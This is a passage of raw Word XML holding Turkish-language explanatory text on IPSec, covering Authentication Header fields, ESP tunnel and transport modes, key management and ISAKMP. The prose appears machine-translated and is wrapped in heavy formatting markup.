          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B"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İşlev, güvenlik ilişkisinde (SA) belirtilen algoritma ve tuşları kullanarak tüm datagram üzerinde hesaplanır. Hesaplama, fragmantasyondan önce yapılır ve taşıma sırasında değişen alanlar (örneğin, ttl veya hop sayısı) hariç tutulur. Ortaya çıkan kimlik doğrulama verileri, SA'ya atanan Güvenlik Parametre Dizini (SPI) ile birlikte Kimlik Doğrulama Başlığına (AH) yerleştirilir. Kimlik doğrulama verilerini orijinal veri programına eklemek yerine kendi yük kapasitesi yapısına (AH) yerleştirmek, kullanıcı datagramının orijinal biçimini koruduğu ve kimlik doğrulamaya katılmamış sistemler tarafından okunup işlenebileceği anlamına gelir. Açıkçası, hiçbir gizlilik yoktur, ancak IPSec kimlik doğrulama işlevini desteklemek için İnternet altyapısını değiştirmeye de gerek yoktur. Doğrulamaya katılmayan sistemler hala normal olarak datagramları işleyebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B"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Kimlik Doğrulama Başlığı (AH), IP başlığından (IPv4) veya Hop-Hop Başlığından (IPv6) hemen sonra ve görüldüğü gibi gizlilik işleviyle kullanıldığında ESP başlığından hemen önce datagrama eklenir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B"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Başlık tipi, IANA atanan sayı 51'dir ve bir sonraki başlıkta veya önceki başlık yapısının protokol alanında tanımlanır. Bir kimlik doğrulama başlığında, şu anda dördü kullanımda olan beş adet parametre alanı vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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Bir sonraki başlık alanı - bir sonraki başlık yapısında kullanılan IP protokolünü (IANA atanan numara) tanımlamak için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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Yük taşıma uzunluğu - kimlik doğrulama veri alanında bulunan 32 bit kelimelerin sayısı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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Ayrılmış alan - gelecekteki genişleme için tasarlanmıştır. Bu alan şu anda sıfıra ayarlanmış</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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SPI alanı - bu datagram için kullanılan güvenlik birliğini (SA) benzersiz şekilde tanımlayan değer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21E8B" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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A21E8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Doğrulama verileri alanı - bir sonraki 32 bit sınırına kadar doldurulmuş kriptografik dönüşümün verileri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gizlilik İşlevi</w:t>
      </w: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 xml:space="preserve">IPSec gizliliği, IP datagramları için güçlü bir bütünlük ve gizlilik sağlamak için anahtarlı şifreleme kullanır. Varsayılan algoritma, kimlik doğrulama veya reddetme sağlamayan ABD Veri Şifreleme Standardı'nın (DES CBC) Şifreleme Blok Zincirleme modunu kullanır. Kimlik doğrulamayı, onu destekleyen bir şifreleme dönüşümü kullanarak sağlamak mümkündür. Bununla birlikte, kimlik doğrulama veya reddetme gerektiren uygulamaların bu amaçla IP Kimlik Doğrulama Başlığını kullanmaları önerilir. IPSec gizlilik fonksiyonu, trafik analizi saldırılarına karşı koruma sağlamaz. İki çalışma modu vardır: tünel ve taşıma. Tünel modunda, orijinal IP datagramının tüm içeriği, güvenlik ilişkisinde (SA) belirtilen algoritma ve anahtar (lar) kullanılarak </w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Encapsulation Security Payload (ESP) içinde saklanır. Bu SA'ya atanan Güvenlik Parametre Dizini (SPI) ile birlikte ortaya çıkan şifrelenmiş ESP, ikinci bir datagramın açık metin IP başlığına sahip bir veri yükü kısmı haline gelir. Bu açık metin başlığı genellikle, ana bilgisayardan ana bilgisayara aktarımlar için orijinal başlığın kopyasıdır, ancak güvenlik ağ geçitleri içeren uygulamalarda açık metin başlığı genellikle ağ geçidine yöneliktir, şifreli başlığın adres noktası ise bir iç alt ağdaki uç nokta ana bilgisayarıdır. Aktarım modunda, çerçevenin sadece aktarım katmanı (yani, TCP, UDP) kısmı ESP içine yerleştirilir, böylece IP başlığının açık metin bölümleri orijinal değerlerini korur. “Aktarım modu” terimi, TCP ve UDP protokolleriyle sınırlı bir kullanım anlamına gelse de, bu bir yanlış isimdir. Aktarım modu ESP, tüm IP istemci protokollerini destekler. Her iki mod için de işleme, çıktıda parçalanma öncesinde ve girdide tekrar bir araya getirme işleminden sonra gerçekleşir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kapsülleme Güvenlik Yükü (ESP) başlığı, IP Başlığından sonra ve taşıma katmanı protokolünden önce datagramın herhangi bir yerine yerleştirilebilir. Kimlik doğrulama işleviyle kullanıldığında, AH başlığından sonra görünmelidir (bkz. Ek 39.3). Başlık tipi IANA tarafından atanan numara 50'dir ve bir sonraki başlıkta veya önceki başlık yapısının protokol alanında tanımlanır. ESP başlığı üç alan içeriyor</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SPI alanı - bu datagramı işlemek için kullanılan SA için benzersiz tanımlayıcı. Bu tek zorunlu ESP alanıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Opak dönüşüm verileri alanı - bu SA tarafından kullanılan şifreleme dönüşümünü desteklemek için gereken ek parametreler (örneğin, bir başlangıç ​​vektörü). Bu alandaki veriler spesifik bir dönüşümdür ve bu nedenle uzunlukları değişir. Tek IPSec gereksinimi, alanın yastıklı olması, böylece 32-bit sınırda bitmesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Şifreli veri alanı - kriptografik dönüşümün verdiği veri.</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ESP uyumluluğunu iddia eden IP sürüm 4 veya sürüm 6 sistemleri, DES CBC dönüşümünün kullanımını destekleyen Enkapsülasyon Güvenlik Protokolünü uygulamalıdır. Tüm ESP uygulamalarının diğer şifreleme algoritmalarını destekleme seçeneği vardır. Örneğin, gelen bir datagram için geçerli bir SA mevcut değilse (örneğin, alıcının anahtarı yoktur), alıcı şifreli ESP'yi atmalı ve arızayı bir sistem veya denetim günlüğüne kaydetmelidir. Kaydedilmesi önerilen değerler SPI değeri, tarih / saat, gönderen ve hedef adresleri ve akış kimliğidir. Günlük girişi, diğer uygulamaya özel verileri içerebilir. Alıcı sistemin, kullanımı kolay hizmet reddi saldırıları için güçlü bir potansiyel olması nedeniyle, gönderim sistemine arıza bildirimi göndermemesi önerilir. Şifrelenmiş verilerin ESP kullanan sistemler tarafından hesaplanması, işlem maliyetlerini ve iletişim gecikmesini artırır. Genel etki şifreleme algoritmasına ve uygulamaya bağlıdır. Gizli anahtar algoritmaları, genel anahtar algoritmalarından çok daha az işlem süresi gerektirir ve donanım tabanlı uygulamalar çok az sistem etkisiyle daha hızlı olma eğilimindedir. Kapsülleme Güvenlik Yükü fonksiyonu, bazı uluslararası ihracat ve kullanım kısıtlamalarını uygulamak ve bunlara tabi olmak için daha zordur, ancak esnek yapısı, VPN özellikleri ve güçlü gizliliği, güvenilmez ağlar arasında güvenli iletişim gerektiren işletmeler için idealdir.</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b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.5.Anahtar Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>önetimi</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>Anahtar yönetimi işlevleri, güvenli iletişim kurmak için gereken şifreleme anahtarlarının oluşturulmasını, onaylanmasını ve dağıtımını içerir. İşlevler, destekledikleri kriptografik algoritmalara yakından bağlıdır, ancak genel olarak, üretim, anahtarları yaratan ve yaşam süreleri ve konumlarını yöneten işlevdir; kimlik doğrulama, anahtar hizmetleri talep eden ana bilgisayarları veya ağ geçitlerini doğrulamak için kullanılan işlemdir; ve dağıtım, anahtarları talep eden sistemlere güvenli bir şekilde aktaran işlemdir.</w:t>
      </w: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 </w:t>
      </w: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IP anahtarlamaya iki genel yaklaşım vardır: ana bilgisayar odaklı ve kullanıcı odaklı. Ana bilgisayar odaklı anahtarlar, tüm kullanıcıların uç nokta (yani ana bilgisayarlar ve ağ geçitleri) arasında veri aktarırken aynı anahtarı paylaşmasını sağlar. Kullanıcı odaklı anahtarlama, her bir kullanıcı oturumu için uç noktalar arasında veri aktaran ayrı bir anahtar oluşturur. Anahtarlar kullanıcılar veya uygulamalar arasında paylaşılmaz. Kullanıcıların Telnet ve FTP oturumları için farklı anahtarları vardır. Çok seviyeli güvenlik (MLS) sistemleri, farklı hassasiyet seviyeleri arasındaki gizliliği korumak için kullanıcı odaklı anahtarlama gerektirir. Ancak, MLS olmayan sistemlerde birbirine güvenmeyen kullanıcıların, grupların veya işlemlerin olması nadir değildir. Bu nedenle, IETF Güvenlik Çalışma Grubu, tüm IPSec anahtar yönetimi uygulamaları için kullanıcı odaklı anahtarlamanın kullanılmasını şiddetle tavsiye eder.</w:t>
      </w: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Şimdiye kadar sadece geleneksel şifreleme anahtar yönetiminden bahsettik. Bununla birlikte, geleneksel anahtar yönetimi işlevleri tam bir IPSec uygulamasını destekleyemez. IPSec’in dönüşüm bağımsızlığı, güvenlik birliğinin tüm öğelerinin, yalnızca şifreleme anahtarlarının değil, katılımcı uç noktalara dağıtılmasını gerektirir. Tüm güvenlik ilişkilendirme parametreleri olmadan, uç noktalar şifreleme anahtarının nasıl uygulandığını belirleyemez. Bu gereklilik, İnternet Güvenlik Birliği ve Anahtar Yönetimi Protokolü'nün (ISAKMP) geliştirilmesine yol açmıştır. ISAKMP standart anahtar yönetimi işlevlerini destekler ve güvenlik ilişkilerini ve özniteliklerini görüşmek, kurmak, değiştirmek ve silmek için mekanizmalar içerir. Bu bölümün geri kalanında, tüm SA yapısının (kriptografik anahtarlar dahil) yönetimine ve bir anahtarın yalnızca kriptografik anahtar parametrelerine atıfta bulunmak için anahtar yönetimine değinmek için “SA yönetimi” terimini kullanacağız. Kilit yönetimin SA yönetiminden ayrı olarak yapılabileceğini not etmek önemlidir. Örneğin, ana bilgisayar odaklı anahtarlama, hem oturum parametrelerini hem de kriptografik anahtarları oluşturmak için SA yönetimini kullanırken, kullanıcı odaklı anahtarlama, ilk oturum parametrelerini oluşturmak için SA yönetim işlevini ve bireysel kullanım oturum anahtarlarını sağlamak için anahtar yönetim işlevini kullanır. .</w:t>
      </w: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SA veya anahtar yönetiminin en basit şekli manuel yönetimdir. Sistem güvenliği yöneticisi kendi sistemleri ve iletişim kurdukları sistemler için SA parametrelerini ve şifreleme anahtarlarını manuel olarak girer. IPSec'in tüm IPv4 ve IPv6 uygulamaları, güvenlik ilişkilerinin ve anahtarların el ile yapılandırılmasını desteklemek için gereklidir. Manuel konfigürasyon küçük, statik ortamlarda iyi çalışır ancak daha büyük ortamlara, özellikle de birden fazla idari alan içerenlere ölçeklendirmek için çok zor. Bu ortamlarda, SA ve kilit yönetim fonksiyonları etkin olması için otomatikleştirilmeli ve merkezileştirilmelidir. Bu, ISAKMP'nin sağlamak için tasarlandığı bir işlevdir.</w:t>
      </w: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b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>İnternet Güvenliği Birliği ve Anahtar Yönetimi Protokolü (ISAKMP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4"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 xml:space="preserve">ISAKMP, güvenlik ilişkilerini ve şifreleme anahtarlarını dağıtmak için standart, esnek ve ölçeklenebilir bir metodoloji sunmaktadır. Protokol, iletişim kuranın kimliğini doğrulamak, güvenlik birlikleri oluşturmak ve yönetmek, anahtarlar ve güvenlik birlikleri oluşturmak ve yönetmek için kullanılan teknikler ve tekrarlama ve hizmet reddi saldırıları gibi tehditleri hafifletme yöntemlerini tanımlar. ISAKMP, IPSec AH ve ESP servislerini destekleyecek şekilde tasarlanmıştır, ancak bunun ötesine geçer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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ISAKMP, çeşitli güvenlik mekanizmaları için nakliye ve uygulama katmanlarında güvenlik hizmetlerini destekleme kabiliyetine sahiptir. Bu mümkündür, çünkü ISAKMP güvenlik birliği yönetimi fonksiyonunu anahtar değişim mekanizmasından ayırır. ISAKMP, anahtar değişim protokolünün bağımsızlığına sahiptir. Birbirine benzemeyen sistemler arasında SA'ları pazarlamak, değiştirmek, değiştirmek ve silmek için ortak bir çerçeve sağlar. ISAKMP ile güvenlik birliklerinin yönetimini merkezileştirmek, her güvenlik protokolündeki çoğaltılan işlevlerin çoğunu azaltır ve bağlantı kurulum süresini önemli ölçüde azaltır çünkü ISAKMP bir seferde tüm hizmetleri pazarlık edebilir.</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ISAKMP'nin ayrıntılı bir tartışması bu bölümün kapsamı dışındadır, bu nedenle yalnızca bir güvenlik birliğinin ve kilit yönetim sisteminin operasyonları ve işlevsel gereksinimleri ele alınacaktır. Bir güvenlik birliği ve anahtar yönetim sistemi, güvenli bağlantılar kuran sistemler arasında aracılık eden bir hizmet uygulamasıdır. Bu sistemler arasında veri transferine aktif olarak katılmamaktadır. Yalnızca gerekli güvenlik ilişkilerini ve şifreleme anahtarlarını üreterek, doğrulayarak ve dağıtarak güvenli bir bağlantı kurulmasına yardımcı olur.</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Sistemin düzgün çalışması için iki parametre üzerinde anlaşmaya varılmalıdır. İlk olarak, uç nokta sistemleri ve SA yöneticisi arasında bir güven ilişkisi kurulmalıdır. SA yöneticisi, bir Kerberos Anahtar Dağıtım Merkezi'ne (KDC) benzeyen veya uç noktadaki IPSec uygulamasına entegre olan üçüncü taraf bir sistem olabilir. Her yaklaşım, her yönetici ve iletişim kurduğu bitiş noktaları için el ile yapılandırılmış bir SA gerektirir. Bunun avantajı, bu birkaç manuel SA'nın çok sayıda güvenli bağlantı kurmak için kullanılabiliyor olmasıdır. Çoğu satıcı, ISAKMP'yi uç nokta sistemlerine entegre etmeyi ve başlangıçtaki güven ilişkisini doğrulamak için üçüncü taraf (örneğin, belirli bir Otorite) sistemini kullanmayı seçti. İkinci şart, bitiş noktalarının ortak bir güvenilen üçüncü tarafa sahip olmalarıdır. Başka bir deyişle, her iki uç noktanın da her ikisine de güvendiği bir SA yönetim sistemine veya belirli bir Otorite'ye sahip olması gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69A3012E" wp14:editId="2D7136E6">
            <wp:extent cx="5489739" cy="2189018"/>
            <wp:effectExtent l="0" t="0" r="0" b="19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949" t="14323" r="28447" b="44842"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5519033" cy="2200699"/>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FC39D1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ResimYazs"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="212121"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Şekil </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Şekil \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FC39D1">
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:ISAKMP Mesaj Şekli</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Operasyon oldukça basit. Bu senaryo için entegre SA'lara sahip sistemleri kullanacağız. Sistem A, Sistem B ile güvenli bir iletişim oturumu kurmak istiyor ve aralarında geçerli bir güvenlik birliği yok. Sistem A, Sistem B'deki SA yönetim işleviyle bağlantı kurar. İşlem B, Sistem A'ya güvenli bir dönüş yolu belirlediğinden, işlem kendini tersine çevirir (SA'ların yalnızca bir yönde oluşturulduğunu unutmayın). ISAKMP, bir çift yönlü SA'ları müzakere etme yeteneğine sahiptir. tek bir işlem, bu nedenle ayrı bir dönüş yolu anlaşması genellikle gerekli değildir.</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ISAKMP dört ana işlevsel bileşene sahiptir. Onlar:</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 xml:space="preserve">1. İletişim meslektaşlarının kimlik doğrulaması </w:t>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2. Şifreleme anahtarı oluşturulması ve yönetimi</w:t>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3. Güvenlik birliği oluşturma ve yönetimi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
